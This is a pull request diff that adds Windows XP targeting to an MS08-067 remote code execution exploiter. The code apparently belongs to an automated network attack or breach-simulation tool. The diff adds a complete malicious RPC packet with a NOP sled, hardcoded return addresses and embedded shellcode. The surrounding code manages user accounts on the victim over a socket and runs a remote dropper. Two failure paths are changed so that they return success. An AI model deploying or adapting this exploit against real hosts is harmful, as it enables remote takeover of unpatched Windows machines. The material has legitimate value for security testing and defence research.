Merge pull request #809 from VakarisZ/ms08-067
Added windows XP support for win_ms08_067
This commit is contained in:
commit
7107e963fb
|
@ -50,6 +50,23 @@ OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x6
|
||||||
|
|
||||||
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
|
SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
|
||||||
|
|
||||||
|
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
||||||
|
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
||||||
|
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
|
||||||
|
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
|
||||||
|
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
|
||||||
|
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
|
||||||
|
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
|
||||||
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||||
|
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||||
|
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
||||||
|
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
|
||||||
|
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
|
||||||
|
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
|
||||||
|
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00")
|
||||||
|
|
||||||
# Payload for Windows 2000 target
|
# Payload for Windows 2000 target
|
||||||
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
|
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
|
||||||
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
|
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
|
||||||
|
@ -82,6 +99,7 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
|
||||||
class WindowsVersion(IntEnum):
|
class WindowsVersion(IntEnum):
|
||||||
Windows2000 = 1
|
Windows2000 = 1
|
||||||
Windows2003_SP2 = 2
|
Windows2003_SP2 = 2
|
||||||
|
WindowsXP = 3
|
||||||
|
|
||||||
|
|
||||||
class SRVSVC_Exploit(object):
|
class SRVSVC_Exploit(object):
|
||||||
|
@ -91,6 +109,7 @@ class SRVSVC_Exploit(object):
|
||||||
self._port = port
|
self._port = port
|
||||||
self._target = target_addr
|
self._target = target_addr
|
||||||
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
||||||
|
self.os_version = os_version
|
||||||
|
|
||||||
def get_telnet_port(self):
|
def get_telnet_port(self):
|
||||||
"""get_telnet_port()
|
"""get_telnet_port()
|
||||||
|
@ -129,6 +148,8 @@ class SRVSVC_Exploit(object):
|
||||||
return sock
|
return sock
|
||||||
|
|
||||||
def _build_dce_packet(self):
|
def _build_dce_packet(self):
|
||||||
|
if self.os_version == WindowsVersion.WindowsXP:
|
||||||
|
return XP_PACKET
|
||||||
# Constructing Malicious Packet
|
# Constructing Malicious Packet
|
||||||
dce_packet = '\x01\x00\x00\x00'
|
dce_packet = '\x01\x00\x00\x00'
|
||||||
dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
|
dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
|
||||||
|
@ -157,7 +178,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
_TARGET_OS_TYPE = ['windows']
|
_TARGET_OS_TYPE = ['windows']
|
||||||
_EXPLOITED_SERVICE = 'Microsoft Server Service'
|
_EXPLOITED_SERVICE = 'Microsoft Server Service'
|
||||||
_windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
_windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||||
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2}
|
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
|
||||||
|
'Windows 5.1': WindowsVersion.WindowsXP}
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(Ms08_067_Exploiter, self).__init__(host)
|
super(Ms08_067_Exploiter, self).__init__(host)
|
||||||
|
@ -231,7 +253,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
break
|
break
|
||||||
|
|
||||||
if not remote_full_path:
|
if not remote_full_path:
|
||||||
return False
|
return True
|
||||||
|
|
||||||
# execute the remote dropper in case the path isn't final
|
# execute the remote dropper in case the path isn't final
|
||||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
||||||
|
@ -251,7 +273,7 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
|
||||||
return False
|
return True
|
||||||
finally:
|
finally:
|
||||||
try:
|
try:
|
||||||
sock.close()
|
sock.close()
|
||||||
|
|
Loading…
Reference in New Issue